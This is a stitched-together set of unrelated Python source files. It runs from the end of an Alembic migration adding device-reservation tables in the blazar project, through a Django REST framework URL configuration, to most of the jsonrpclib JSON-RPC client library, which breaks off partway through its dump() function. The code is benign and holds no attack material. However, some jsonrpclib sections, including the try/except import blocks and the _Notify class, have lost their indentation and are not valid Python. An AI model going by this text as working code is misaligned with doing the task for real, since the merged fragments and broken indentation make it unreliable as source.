                    sa.Column('updated_at', sa.DateTime(), nullable=True),
                    sa.Column('id', sa.String(length=36), nullable=False),
                    sa.Column('name', sa.String(length=255), nullable=False),
                    sa.Column('device_type',
                              sa.Enum('container', 'vm', 'shell',
                                      name='allowed_device_types'),
                              nullable=False),
                    sa.Column('device_driver', sa.Enum(
                        'zun', name='allowed_device_drivers'), nullable=False),
                    sa.Column('reservable', sa.Boolean(),
                              server_default=sa.text('true'), nullable=False),
                    sa.PrimaryKeyConstraint('id')
                    )
    # Free-form extra capabilities attached to a device
    op.create_table('device_extra_capabilities',
                    sa.Column('created_at', sa.DateTime(), nullable=True),
                    sa.Column('updated_at', sa.DateTime(), nullable=True),
                    sa.Column('id', sa.String(length=36), nullable=False),
                    sa.Column('device_id', sa.String(
                        length=36), nullable=False),
                    sa.Column('capability_id', sa.String(
                        length=255), nullable=False),
                    sa.Column('capability_value', sa.Text().with_variant(
                        mysql.MEDIUMTEXT(), 'mysql'), nullable=False),
                    sa.ForeignKeyConstraint(
                        ['capability_id'], ['extra_capabilities.id'], ),
                    sa.ForeignKeyConstraint(['device_id'], ['devices.id'], ),
                    sa.PrimaryKeyConstraint('id')
                    )
    # Mapping of devices to the reservations holding them (soft-deletable)
    op.create_table('device_allocations',
                    sa.Column('created_at', sa.DateTime(), nullable=True),
                    sa.Column('updated_at', sa.DateTime(), nullable=True),
                    sa.Column('deleted_at', sa.DateTime(), nullable=True),
                    sa.Column('deleted', sa.String(length=36), nullable=True),
                    sa.Column('id', sa.String(length=36), nullable=False),
                    sa.Column('device_id', sa.String(
                        length=36), nullable=True),
                    sa.Column('reservation_id', sa.String(
                        length=36), nullable=True),
                    sa.ForeignKeyConstraint(['device_id'], ['devices.id'], ),
                    sa.ForeignKeyConstraint(['reservation_id'], [
                        'reservations.id'], ),
                    sa.PrimaryKeyConstraint('id')
                    )
    # Device-specific reservation parameters (soft-deletable)
    op.create_table('device_reservations',
                    sa.Column('created_at', sa.DateTime(), nullable=True),
                    sa.Column('updated_at', sa.DateTime(), nullable=True),
                    sa.Column('deleted_at', sa.DateTime(), nullable=True),
                    sa.Column('deleted', sa.String(length=36), nullable=True),
                    sa.Column('id', sa.String(length=36), nullable=False),
                    sa.Column('reservation_id', sa.String(
                        length=36), nullable=True),
                    sa.Column('count_range', sa.String(
                        length=36), nullable=True),
                    sa.Column('resource_properties', sa.Text().with_variant(
                        mysql.MEDIUMTEXT(), 'mysql'), nullable=True),
                    sa.Column('before_end', sa.String(
                        length=36), nullable=True),
                    sa.ForeignKeyConstraint(['reservation_id'], [
                        'reservations.id'], ),
                    sa.PrimaryKeyConstraint('id')
                    )
    # Tighten the existing column now that all rows carry a value
    op.alter_column('instance_reservations', 'affinity',
                    existing_type=mysql.TINYINT(display_width=1),
                    nullable=False)
    # ### end Alembic commands ###
def downgrade():
    """Revert the migration: drop the device-reservation tables and make
    ``instance_reservations.affinity`` nullable again.
    """
    # ### commands auto generated by Alembic - please adjust! ###
    op.alter_column('instance_reservations', 'affinity',
                    existing_type=mysql.TINYINT(display_width=1),
                    nullable=True)
    # Drop in reverse dependency order (children before parents)
    op.drop_table('device_reservations')
    op.drop_table('device_allocations')
    op.drop_table('device_extra_capabilities')
    op.drop_table('devices')
    # ### end Alembic commands ###
| ChameleonCloud/blazar | blazar/db/migration/alembic_migrations/versions/42c7fd6e792e_add_device_reservation.py | Python | apache-2.0 | 5,436 | 0.000552 |
# URL configuration for the okrest project.
# NOTE: uses the pre-Django-1.10 ``patterns()`` API, kept for the Django
# version this project pins.
from django.conf.urls import patterns, include, url
from django.contrib import admin

from rest_framework.routers import DefaultRouter

from api import views

# Make sure every installed app's admin module is loaded
admin.autodiscover()

# The router generates the URL conf for the registered viewsets
router = DefaultRouter()
router.register(r'headings', views.HeadingViewSet)
router.register(r'users', views.UserViewSet)

urlpatterns = patterns(
    '',
    # All API routes produced by the router
    url(r'^', include(router.urls)),
    # Browsable-API login/logout views
    url(r'^api-auth/',
        include('rest_framework.urls', namespace='rest_framework')),
)
#!/usr/bin/python
# -- Content-Encoding: UTF-8 --
"""
============================
JSONRPC Library (jsonrpclib)
============================
This library is a JSON-RPC v.2 (proposed) implementation which
follows the xmlrpclib API for portability between clients. It
uses the same Server / ServerProxy, loads, dumps, etc. syntax,
while providing features not present in XML-RPC like:
* Keyword arguments
* Notifications
* Versioning
* Batches and batch notifications
Eventually, I'll add a SimpleXMLRPCServer compatible library,
and other things to tie the thing off nicely. :)
For a quick-start, just open a console and type the following,
replacing the server address, method, and parameters
appropriately.
>>> import jsonrpclib
>>> server = jsonrpclib.Server('http://localhost:8181')
>>> server.add(5, 6)
11
>>> server._notify.add(5, 6)
>>> batch = jsonrpclib.MultiCall(server)
>>> batch.add(3, 50)
>>> batch.add(2, 3)
>>> batch._notify.add(3, 5)
>>> batch()
[53, 5]
See https://github.com/tcalmant/jsonrpclib for more info.
:authors: Josh Marshall, Thomas Calmant
:copyright: Copyright 2020, Thomas Calmant
:license: Apache License 2.0
:version: 0.4.2
..
Copyright 2020 Thomas Calmant
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Standard library
import contextlib
import logging
import os
import socket
import sys
import uuid
try:
# Python 3
# pylint: disable=F0401,E0611
from http.client import HTTPConnection
from urllib.parse import urlparse
from xmlrpc.client import Transport as XMLTransport
from xmlrpc.client import SafeTransport as XMLSafeTransport
from xmlrpc.client import ServerProxy as XMLServerProxy
from xmlrpc.client import _Method as XML_Method
except ImportError:
# Python 2
# pylint: disable=F0401,E0611
from httplib import HTTPConnection # type: ignore
from urlparse import urlparse # type: ignore
from xmlrpclib import Transport as XMLTransport # type: ignore
from xmlrpclib import SafeTransport as XMLSafeTransport # type: ignore
from xmlrpclib import ServerProxy as XMLServerProxy # type: ignore
from xmlrpclib import _Method as XML_Method # type: ignore
try:
# Check GZip support
import gzip
except ImportError:
# Python can be built without zlib/gzip support
# pylint: disable=C0103
gzip = None # type: ignore
# Library includes
import jsonrpclib.config
import jsonrpclib.jsonclass as jsonclass
import jsonrpclib.utils as utils
# ------------------------------------------------------------------------------
# Module version
__version_info__ = (0, 4, 2)
__version__ = ".".join(str(x) for x in __version_info__)
# Documentation strings format
__docformat__ = "restructuredtext en"
# Create the logger
_logger = logging.getLogger(__name__)
# ------------------------------------------------------------------------------
# JSON library import
# Preference order: cjson (optional C implementation), then the standard
# json module, then simplejson. jdumps/jloads wrap whichever was found.
try:
    # pylint: disable=F0401,E0611
    # Using cjson
    import cjson  # type: ignore
    _logger.debug("Using cjson as JSON library")
    # Declare cjson methods
    def jdumps(obj, encoding="utf-8"):  # pylint: disable=unused-argument
        """
        Serializes ``obj`` to a JSON formatted string, using cjson.
        """
        return cjson.encode(obj)
    def jloads(json_string):
        """
        Deserializes ``json_string`` (a string containing a JSON document)
        to a Python object, using cjson.
        """
        return cjson.decode(json_string)
except ImportError:
    # pylint: disable=F0401,E0611
    # Use json or simplejson
    try:
        import json
        _logger.debug("Using json as JSON library")
    except ImportError:
        try:
            import simplejson as json  # type: ignore
            _logger.debug("Using simplejson as JSON library")
        except ImportError:
            # No JSON implementation at all: the library cannot work
            _logger.error("No supported JSON library found")
            raise ImportError(
                "You must have the cjson, json, or simplejson "
                "module(s) available."
            )
    # Declare json methods
    if sys.version_info[0] < 3:
        def jdumps(obj, encoding="utf-8"):
            """
            Serializes ``obj`` to a JSON formatted string.
            """
            # Python 2 (explicit encoding)
            return json.dumps(obj, encoding=encoding)
    else:
        # Python 3
        def jdumps(obj, encoding="utf-8"):  # pylint: disable=unused-argument
            """
            Serializes ``obj`` to a JSON formatted string.
            """
            # Python 3 (the encoding parameter has been removed)
            return json.dumps(obj)
    def jloads(json_string):
        """
        Deserializes ``json_string`` (a string containing a JSON document)
        to a Python object.
        """
        return json.loads(json_string)
# ------------------------------------------------------------------------------
# XMLRPClib re-implementations
class ProtocolError(Exception):
    """
    JSON-RPC error, raised for protocol- or transport-level failures.
    ProtocolError.args[0] can be:
    * an error message (string)
    * a (code, message) tuple
    """
class AppError(ProtocolError):
    """
    Application-level error: the fault code is not one of the
    pre-defined JSON-RPC error codes.
    The single exception argument is a 3-tuple:
    AppError.args[0][0]: Error code
    AppError.args[0][1]: Error message or trace
    AppError.args[0][2]: Associated data
    """
    def data(self):
        """
        Retrieves the value found in the 'data' entry of the error, or None
        :return: The data associated to the error, or None
        """
        # args[0] is the (code, message, data) fault tuple
        fault = self.args[0]  # pylint: disable=unsubscriptable-object
        return fault[2]
class TransportError(ProtocolError):
    """
    HTTP transport failure: a specialized protocol error
    """
    def __init__(self, url, errcode, errmsg, msg):
        """
        :param url: Target URL
        :param errcode: HTTP error code
        :param errmsg: HTTP error code description
        :param msg: Exception message
        """
        ProtocolError.__init__(self, url, errcode, errmsg, msg)
        self.url = url
        self.errcode = errcode
        self.errmsg = errmsg
        self.msg = msg
    def __repr__(self):
        """
        String representation: type, URL and HTTP status
        """
        type_name = type(self).__name__
        return "<%s for %s: %s %s>" % (
            type_name, self.url, self.errcode, self.errmsg
        )
class JSONParser(object):
    """
    Default JSON parser: forwards raw data to its target unmarshaller
    """
    def __init__(self, target):
        """
        Associates the target loader to the parser
        :param target: a JSONTarget instance
        """
        self.target = target
    def feed(self, data):
        """
        Forwards the given chunk of data to the associated target
        """
        self.target.feed(data)
    @staticmethod
    def close():
        """
        Nothing to close; kept for parser-API compatibility
        """
class JSONTarget(object):
    """
    Accumulates streamed chunks and joins/decodes them on close
    """
    def __init__(self):
        """
        Sets up the chunk buffer
        """
        # Raw chunks, kept as received (str or bytes)
        self.data = []
    def feed(self, data):
        """
        Buffers a chunk of raw data (a chunk may end in the middle of a
        wide character, hence no early decoding)
        """
        self.data.append(data)
    def close(self):
        """
        Joins the buffered chunks and converts them to a string
        """
        if not self.data:
            return ""
        # Join with an empty str or bytes, matching the chunk type
        joined = type(self.data[0])().join(self.data)
        try:
            # Convert the whole final payload to a string
            return utils.from_bytes(joined)
        except (TypeError, ValueError):
            # Not convertible: pass the joined payload through unchanged
            return joined
class TransportMixIn(object):
    """ Just extends the XML-RPC transport where necessary. """
    # for Python 2.7 support
    # Cached (host, connection) pair managed by the xmlrpclib base class
    _connection = None
    # List of non-overridable headers
    # Use the configuration to change the content-type
    readonly_headers = ("content-length", "content-type")
    def __init__(self, config=jsonrpclib.config.DEFAULT, context=None):
        """
        Sets up the transport
        :param config: A JSONRPClib Config instance
        :param context: Optional SSL context (used by SafeTransport)
        """
        # Store the configuration
        self._config = config
        # Store the SSL context
        self.context = context
        # Set up the user agent
        self.user_agent = config.user_agent
        # Additional headers: list of dictionaries
        self.additional_headers = []
        # Avoid a pep-8 error
        self.accept_gzip_encoding = True
        self.verbose = False
    def push_headers(self, headers):
        """
        Adds a dictionary of headers to the additional headers list
        :param headers: A dictionary
        """
        self.additional_headers.append(headers)
    def pop_headers(self, headers):
        """
        Removes the given dictionary from the additional headers list.
        Also validates that given headers are on top of the stack
        :param headers: Headers to remove
        :raise AssertionError: The given dictionary is not on the latest stored
                               in the additional headers list
        """
        assert self.additional_headers[-1] == headers
        self.additional_headers.pop()
    def emit_additional_headers(self, connection):
        """
        Puts headers as is in the request, filtered read only headers
        :param connection: The request connection
        :return: The dictionary of headers added to the connection
        """
        additional_headers = {}
        # Setup extra headers
        # (list of tuples, inherited from xmlrpclib.client.Transport)
        # Authentication headers are stored there
        try:
            extra_headers = self._extra_headers or []
        except AttributeError:
            # Not available this version of Python (should not happen)
            pass
        else:
            for (key, value) in extra_headers:
                additional_headers[key] = value
        # Prepare the merged dictionary
        for headers in self.additional_headers:
            additional_headers.update(headers)
        # Normalize keys and values
        additional_headers = dict(
            (str(key).lower(), str(value))
            for key, value in additional_headers.items()
        )
        # Remove forbidden keys
        for forbidden in self.readonly_headers:
            additional_headers.pop(forbidden, None)
        # Reversed order: in the case of multiple headers value definition,
        # the latest pushed has priority
        for key, value in additional_headers.items():
            connection.putheader(key, value)
        return additional_headers
    def single_request(self, host, handler, request_body, verbose=0):
        """
        Send a complete request, and parse the response.
        From xmlrpclib in Python 2.7
        :param host: Target host.
        :param handler: Target RPC handler.
        :param request_body: JSON-RPC request body.
        :param verbose: Debugging flag.
        :return: Parsed response.
        """
        connection = self.make_connection(host)
        try:
            self.send_request(connection, handler, request_body, verbose)
            self.send_content(connection, request_body)
            response = connection.getresponse()
            if response.status == 200:
                self.verbose = verbose
                return self.parse_response(response)
        except:
            # NOTE(review): bare except kept from the xmlrpclib original --
            # it also catches BaseException so the connection is always
            # discarded on failure before re-raising
            # All unexpected errors leave connection in
            # a strange state, so we clear it.
            self.close()
            raise
        # Non-200 status: discard any response data and raise exception
        if response.getheader("content-length", 0):
            response.read()
        raise TransportError(
            host + handler, response.status, response.reason, response.msg
        )
    def send_request(self, connection, handler, request_body, debug=0):
        """
        Send HTTP request.
        From xmlrpc.client in Python 3.4
        :param connection: Connection handle.
        :param handler: Target RPC handler (a path relative to host)
        :param request_body: The JSON-RPC request body
        :param debug: Enable debugging if debug is true.
        :return: An HTTPConnection.
        """
        if debug:
            connection.set_debuglevel(1)
        if self.accept_gzip_encoding and gzip:
            # Advertise gzip support only when the gzip module is available
            connection.putrequest("POST", handler, skip_accept_encoding=True)
            connection.putheader("Accept-Encoding", "gzip")
        else:
            connection.putrequest("POST", handler)
        return connection
    def send_content(self, connection, request_body):
        """
        Completes the request headers and sends the request body of a JSON-RPC
        request over a HTTPConnection
        :param connection: An HTTPConnection object
        :param request_body: JSON-RPC request body
        """
        # Convert the body first
        request_body = utils.to_bytes(request_body)
        # "static" headers
        connection.putheader("Content-Type", self._config.content_type)
        connection.putheader("Content-Length", str(len(request_body)))
        # Emit additional headers here in order not to override content-length
        additional_headers = self.emit_additional_headers(connection)
        # Add the user agent, if not overridden
        if "user-agent" not in additional_headers:
            connection.putheader("User-Agent", self.user_agent)
        connection.endheaders()
        if request_body:
            connection.send(request_body)
    @staticmethod
    def getparser():
        """
        Create an instance of the parser, and attach it to an unmarshalling
        object. Return both objects.
        :return: The parser and unmarshaller instances
        """
        target = JSONTarget()
        return JSONParser(target), target
class Transport(TransportMixIn, XMLTransport):
    """
    Mixed-in HTTP transport
    """
    def __init__(self, config):
        # Initialize both bases explicitly (no cooperative super() in the
        # old xmlrpclib Transport API)
        TransportMixIn.__init__(self, config)
        XMLTransport.__init__(self)
class SafeTransport(TransportMixIn, XMLSafeTransport):
    """
    Mixed-in HTTPS transport
    """
    def __init__(self, config, context):
        # :param config: A JSONRPClib Config instance
        # :param context: SSLContext to use for HTTPS connections
        TransportMixIn.__init__(self, config, context)
        try:
            # Give the context to XMLSafeTransport, to avoid it setting the
            # context to None.
            # See https://github.com/tcalmant/jsonrpclib/issues/39
            XMLSafeTransport.__init__(self, context=context)
        except TypeError:
            # On old versions of Python (Pre-2014), the context argument
            # wasn't available
            XMLSafeTransport.__init__(self)
# ------------------------------------------------------------------------------
class UnixHTTPConnection(HTTPConnection):
    """
    HTTPConnection variant whose connect() goes through a Unix domain
    socket instead of TCP
    """
    def __init__(self, path, *args, **kwargs):
        """
        Constructs the HTTP connection.
        All arguments except ``path`` are forwarded to the HTTPConnection
        constructor.
        :param path: Path to the Unix socket
        """
        # A HTTP/1.1 client MUST send a 'Host:' header, so pretend we are
        # talking to "localhost"
        HTTPConnection.__init__(self, "localhost", *args, **kwargs)
        self.path = path
    def connect(self):
        """
        Opens a stream connection to the configured Unix socket
        """
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.sock.connect(self.path)
class UnixTransport(TransportMixIn, XMLTransport):
    """
    Mixed-in HTTP transport over a UNIX socket
    """
    def __init__(self, config, path=None):
        """
        :param config: The jsonrpclib configuration
        :param path: Path to the Unix socket (overrides the host name later)
        """
        TransportMixIn.__init__(self, config)
        XMLTransport.__init__(self)
        # Resolved socket path (None: fall back to the request host)
        self.__socket_path = os.path.abspath(path) if path else None
    def make_connection(self, host):
        """
        Connect to server.
        Returns the cached connection when it targets the same host, which
        enables HTTP/1.1 keep-alive (code adapted from xmlrpc.client).
        :param host: Target host (ignored if a path was given)
        :return: A UnixHTTPConnection object
        """
        target = self.__socket_path or host
        # Reuse the existing connection if it points at the same target
        if self._connection and target == self._connection[0]:
            return self._connection[1]
        # Create a HTTP connection object from a host descriptor
        path, self._extra_headers, _ = self.get_host_info(target)
        self._connection = target, UnixHTTPConnection(path)
        return self._connection[1]
# ------------------------------------------------------------------------------
class ServerProxy(XMLServerProxy):
    """
    Unfortunately, much more of this class has to be copied since
    so much of it does the serialization.
    """
    # NOTE: attributes use double-underscore names on purpose: name mangling
    # (e.g. _ServerProxy__host) keeps them out of the way of __getattr__,
    # which proxies every normal attribute access to the remote server
    def __init__(
        self,
        uri,
        transport=None,
        encoding=None,
        verbose=0,
        version=None,
        headers=None,
        history=None,
        config=jsonrpclib.config.DEFAULT,
        context=None,
    ):
        """
        Sets up the server proxy
        :param uri: Request URI
        :param transport: Custom transport handler
        :param encoding: Specified encoding
        :param verbose: Log verbosity level
        :param version: JSON-RPC specification version
        :param headers: Custom additional headers for each request
        :param history: History object (for tests)
        :param config: A JSONRPClib Config instance
        :param context: The optional SSLContext to use
        """
        # Store the configuration
        self._config = config
        self.__version = version or config.version
        su = urlparse(uri)
        schema = su.scheme
        self.__host = su.netloc
        self.__handler = su.path
        use_unix = False
        if schema.startswith("unix+"):
            # "unix+http://..." URI: HTTP over a Unix domain socket
            schema = schema[len("unix+") :]
            use_unix = True
        if schema not in ("http", "https"):
            _logger.error(
                "jsonrpclib only support http(s) URIs, not %s", schema
            )
            raise IOError("Unsupported JSON-RPC protocol.")
        if use_unix:
            # The URL path is the socket file; requests are sent to "/"
            unix_path = self.__handler
            self.__handler = "/"
        elif not self.__handler:
            # Not sure if this is in the JSON spec?
            self.__handler = "/"
        if transport is None:
            if use_unix:
                if schema == "http":
                    # In Unix mode, we use the path part of the URL (handler)
                    # as the path to the socket file
                    transport = UnixTransport(config=config, path=unix_path)
            elif schema == "https":
                transport = SafeTransport(config=config, context=context)
            else:
                transport = Transport(config=config)
        if transport is None:
            # Reached for unsupported combinations such as unix+https
            raise IOError(
                "Unhandled combination: UNIX={}, protocol={}".format(
                    use_unix, schema
                )
            )
        self.__transport = transport
        self.__encoding = encoding
        self.__verbose = verbose
        self.__history = history
        # Global custom headers are injected into Transport
        self.__transport.push_headers(headers or {})
    def _request(self, methodname, params, rpcid=None):
        """
        Calls a method on the remote server
        :param methodname: Name of the method to call
        :param params: Method parameters
        :param rpcid: ID of the remote call
        :return: The parsed result of the call
        """
        request = dumps(
            params,
            methodname,
            encoding=self.__encoding,
            rpcid=rpcid,
            version=self.__version,
            config=self._config,
        )
        response = self._run_request(request)
        check_for_errors(response)
        return response["result"]
    def _request_notify(self, methodname, params, rpcid=None):
        """
        Calls a method as a notification
        :param methodname: Name of the method to call
        :param params: Method parameters
        :param rpcid: ID of the remote call
        """
        request = dumps(
            params,
            methodname,
            encoding=self.__encoding,
            rpcid=rpcid,
            version=self.__version,
            notify=True,
            config=self._config,
        )
        response = self._run_request(request, notify=True)
        check_for_errors(response)
    def _run_request(self, request, notify=False):
        """
        Sends the given request to the remote server
        :param request: The request to send
        :param notify: Notification request flag (unused)
        :return: The response as a parsed JSON object
        """
        if self.__history is not None:
            self.__history.add_request(request)
        response = self.__transport.request(
            self.__host, self.__handler, request, verbose=self.__verbose
        )
        # Here, the XMLRPC library translates a single list
        # response to the single value -- should we do the
        # same, and require a tuple / list to be passed to
        # the response object, or expect the Server to be
        # outputting the response appropriately?
        if self.__history is not None:
            self.__history.add_response(response)
        if not response:
            return None
        else:
            return_obj = loads(response, self._config)
            return return_obj
    def __getattr__(self, name):
        """
        Returns a callable object to call the remote service
        """
        if name.startswith("__") and name.endswith("__"):
            # Don't proxy special methods.
            raise AttributeError("ServerProxy has no attribute '%s'" % name)
        # Same as original, just with new _Method reference
        return _Method(self._request, name)
    def __close(self):
        """
        Closes the transport layer
        """
        self.__transport.close()
    def __call__(self, attr):
        """
        A workaround to get special attributes on the ServerProxy
        without interfering with the magic __getattr__
        (code from xmlrpclib in Python 2.7)
        """
        if attr == "close":
            return self.__close
        elif attr == "transport":
            return self.__transport
        raise AttributeError("Attribute {0} not found".format(attr))
    @property
    def _notify(self):
        """
        Like __getattr__, but sending a notification request instead of a call
        """
        return _Notify(self._request_notify)
    @contextlib.contextmanager
    def _additional_headers(self, headers):
        """
        Allows to specify additional headers, to be added inside the with
        block.
        Example of usage:
        >>> with client._additional_headers({'X-Test' : 'Test'}) as new_client:
        ...     new_client.method()
        ...
        >>> # Here old headers are restored
        """
        self.__transport.push_headers(headers)
        yield self
        self.__transport.pop_headers(headers)
# ------------------------------------------------------------------------------
class _Method(XML_Method):
    """
    Some magic to bind an JSON-RPC method to an RPC server.
    """
    # NOTE: this subclass deliberately shares the class name "_Method" with
    # the xmlrpclib base class, so the name-mangled attributes set there
    # (_Method__send, _Method__name) are accessible as self.__send/__name
    def __call__(self, *args, **kwargs):
        """
        Sends an RPC request and returns the unmarshalled result
        :raise ProtocolError: Both positional and keyword arguments given
        """
        if args and kwargs:
            raise ProtocolError(
                "Cannot use both positional and keyword "
                "arguments (according to JSON-RPC spec.)"
            )
        if args:
            return self.__send(self.__name, args)
        else:
            return self.__send(self.__name, kwargs)
    def __getattr__(self, name):
        """
        Returns a Method object for nested calls
        """
        if name == "__name__":
            return self.__name
        return _Method(self.__send, "{0}.{1}".format(self.__name, name))
    def __repr__(self):
        """
        Returns a string representation of the method
        """
        # Must use __class__ here because the base class is old-style.
        return "<{0} {1}>".format(self.__class__, self.__name)
class _Notify(object):
"""
Same as _Method, but to send notifications
"""
def __init__(self, request):
"""
Sets the method to call to send a request to the server
"""
self._request = request
def __getattr__(self, name):
"""
Returns a Method object, to be called as a notification
"""
return _Method(self._request, name)
# ------------------------------------------------------------------------------
# Batch implementation
class MultiCallMethod(object):
    """
    Stores a single call registered on a MultiCall object, for later
    batch execution
    """
    def __init__(self, method, notify=False, config=jsonrpclib.config.DEFAULT):
        """
        Sets up the stored call
        :param method: Name of the method to call
        :param notify: Notification flag
        :param config: Request configuration
        """
        self.method = method
        self.params = []
        self.notify = notify
        self._config = config
    def __call__(self, *args, **kwargs):
        """
        Stores the call parameters (positional or keyword, not both)
        """
        if kwargs and args:
            raise ProtocolError(
                "JSON-RPC does not support both "
                + "positional and keyword arguments."
            )
        self.params = kwargs if kwargs else args
    def request(self, encoding=None, rpcid=None):
        """
        Returns the JSON-formatted request string for this call
        """
        return dumps(
            self.params,
            self.method,
            version=2.0,
            encoding=encoding,
            rpcid=rpcid,
            notify=self.notify,
            config=self._config,
        )
    def __repr__(self):
        """
        String representation: the JSON request
        """
        return str(self.request())
    def __getattr__(self, method):
        """
        Handles dotted method names by extending the stored name
        """
        self.method = "{0}.{1}".format(self.method, method)
        return self
class MultiCallNotify(object):
    """
    Counterpart of MultiCallMethod used to register notifications
    """
    def __init__(self, multicall, config=jsonrpclib.config.DEFAULT):
        """
        Sets up the store
        :param multicall: The parent MultiCall instance
        :param config: Request configuration
        """
        self.multicall = multicall
        self._config = config
    def __getattr__(self, name):
        """
        Registers and returns a notification job on the parent MultiCall
        """
        job = MultiCallMethod(name, notify=True, config=self._config)
        self.multicall._job_list.append(job)
        return job
class MultiCallIterator(object):
    """
    Iterates over the results of a MultiCall.
    JSON-RPC faults are raised as exceptions when a result is accessed
    """
    def __init__(self, results):
        """
        :param results: The raw list of JSON-RPC responses
        """
        self.results = results
    @staticmethod
    def __get_result(item):
        """
        Validates a single response and extracts its 'result' entry
        """
        check_for_errors(item)
        return item["result"]
    def __iter__(self):
        """
        Yields each result in order
        """
        for entry in self.results:
            yield self.__get_result(entry)
        # Since Python 3.7 (PEP-479), a generator must end with a plain
        # return instead of raising StopIteration
        return
    def __getitem__(self, i):
        """
        Random access to the i-th result
        """
        return self.__get_result(self.results[i])
    def __len__(self):
        """
        Number of stored results
        """
        return len(self.results)
class MultiCall(object):
    """
    server -> a object used to boxcar method calls, where server should be a
    ServerProxy object.
    Methods can be added to the MultiCall using normal
    method call syntax e.g.:
    multicall = MultiCall(server_proxy)
    multicall.add(2,3)
    multicall.get_address("Guido")
    To execute the multicall, call the MultiCall object e.g.:
    add_result, address = multicall()
    """
    def __init__(self, server, config=jsonrpclib.config.DEFAULT):
        """
        Sets up the batch
        :param server: A ServerProxy object
        :param config: Request configuration
        """
        self._server = server
        self._job_list = []
        self._config = config
    def _request(self):
        """
        Sends all registered calls as one batch request
        :return: A MultiCallIterator object, or None if nothing was queued
        """
        if len(self._job_list) < 1:
            # Should we alert? This /is/ pretty obvious.
            return
        request_body = "[ {0} ]".format(
            ",".join(job.request() for job in self._job_list)
        )
        responses = self._server._run_request(request_body)
        # The queue is consumed whether the request succeeded or not
        del self._job_list[:]
        return MultiCallIterator(responses or [])
    @property
    def _notify(self):
        """
        Entry point to register notifications instead of calls
        """
        return MultiCallNotify(self, self._config)
    def __getattr__(self, name):
        """
        Registers a new method call and returns its handle
        """
        job = MultiCallMethod(name, config=self._config)
        self._job_list.append(job)
        return job
    # Calling the MultiCall object sends the batch
    __call__ = _request
# These lines conform to xmlrpclib's "compatibility" line.
# Not really sure if we should include these, but oh well.
# Alias so callers can use jsonrpclib.Server like xmlrpclib.Server
Server = ServerProxy
# ------------------------------------------------------------------------------
class Fault(object):
    """
    Describes a JSON-RPC fault: error code, message and optional data
    """
    def __init__(
        self,
        code=-32000,
        message="Server error",
        rpcid=None,
        config=jsonrpclib.config.DEFAULT,
        data=None,
    ):
        """
        Stores the error description
        :param code: Fault code
        :param message: Associated message
        :param rpcid: Request ID
        :param config: A JSONRPClib Config instance
        :param data: Extra information added to an error description
        """
        self.faultCode = code
        self.faultString = message
        self.rpcid = rpcid
        self.config = config
        self.data = data
    def error(self):
        """
        Dictionary view of the fault
        :returns: A {'code', 'message', 'data'} dictionary
        """
        return {
            "code": self.faultCode,
            "message": self.faultString,
            "data": self.data,
        }
    def response(self, rpcid=None, version=None):
        """
        Serializes the fault as a JSON-RPC response string
        :param rpcid: Forced request ID
        :param version: JSON-RPC version
        :return: A JSON-RPC response string
        """
        version = version or self.config.version
        if rpcid:
            self.rpcid = rpcid
        return dumps(
            self,
            methodresponse=True,
            rpcid=self.rpcid,
            version=version,
            config=self.config,
        )
    def dump(self, rpcid=None, version=None):
        """
        Serializes the fault as a JSON-RPC response dictionary
        :param rpcid: Forced request ID
        :param version: JSON-RPC version
        :return: A JSON-RPC response dictionary
        """
        version = version or self.config.version
        if rpcid:
            self.rpcid = rpcid
        return dump(
            self,
            is_response=True,
            rpcid=self.rpcid,
            version=version,
            config=self.config,
        )
    def __repr__(self):
        """
        String representation of the fault
        """
        return "<Fault %s: %s>" % (self.faultCode, self.faultString)
class Payload(object):
    """
    Builds JSON-RPC message dictionaries: requests, notifications,
    responses and errors
    """
    def __init__(
        self, rpcid=None, version=None, config=jsonrpclib.config.DEFAULT
    ):
        """
        Sets up the JSON-RPC handler
        :param rpcid: Request ID
        :param version: JSON-RPC version
        :param config: A JSONRPClib Config instance
        """
        self.id = rpcid
        # Fall back to the configured version, kept as a float for the
        # ordering comparisons below
        self.version = float(version if version else config.version)
    def request(self, method, params=None):
        """
        Prepares a method call request
        :param method: Method name
        :param params: Method parameters
        :return: A JSON-RPC request dictionary
        :raise ValueError: If the method name is not a string
        """
        if not isinstance(method, utils.STRING_TYPES):
            raise ValueError("Method name must be a string.")
        if not self.id:
            # No ID yet: generate one
            self.id = str(uuid.uuid4())
        message = {"id": self.id, "method": method}
        if params or self.version < 1.1:
            message["params"] = params or []
        if self.version >= 2:
            message["jsonrpc"] = str(self.version)
        return message
    def notify(self, method, params=None):
        """
        Prepares a notification request (a request without an ID)
        :param method: Notification name
        :param params: Notification parameters
        :return: A JSON-RPC notification dictionary
        """
        message = self.request(method, params)
        if self.version >= 2:
            del message["id"]
        else:
            # JSON-RPC 1.0 notifications carry a null ID
            message["id"] = None
        return message
    def response(self, result=None):
        """
        Prepares a response dictionary
        :param result: The result of method call
        :return: A JSON-RPC response dictionary
        """
        message = {"result": result, "id": self.id}
        if self.version >= 2:
            message["jsonrpc"] = str(self.version)
        else:
            # JSON-RPC 1.0 responses always carry an 'error' member
            message["error"] = None
        return message
    def error(self, code=-32000, message="Server error.", data=None):
        """
        Prepares an error dictionary
        :param code: Error code
        :param message: Error message
        :param data: Extra data to associate to the error
        :return: A JSON-RPC error dictionary
        """
        fault = self.response()
        if self.version >= 2:
            del fault["result"]
        else:
            fault["result"] = None
        fault["error"] = {"code": code, "message": message}
        if data is not None:
            fault["error"]["data"] = data
        return fault
# ------------------------------------------------------------------------------
def dump(
    params=None,
    methodname=None,
    rpcid=None,
    version=None,
    is_response=None,
    is_notify=None,
    config=jsonrpclib.config.DEFAULT,
):
    """
    Prepares a JSON-RPC dictionary (request, notification, response or error)

    :param params: Method parameters (if a method name is given) or a Fault
    :param methodname: Method name
    :param rpcid: Request ID
    :param version: JSON-RPC version
    :param is_response: If True, this is a response dictionary
    :param is_notify: If True, this is a notification request
    :param config: A JSONRPClib Config instance
    :return: A JSON-RPC dictionary
    :raise TypeError: Invalid parameters container type
    :raise ValueError: Neither a request nor a response
    """
    # Default version
    if not version:
        version = config.version

    if not is_response and params is None:
        params = []

    # Validate method name and parameters
    valid_params = [utils.TupleType, utils.ListType, utils.DictType, Fault]
    if is_response:
        # A response may legitimately carry a None result
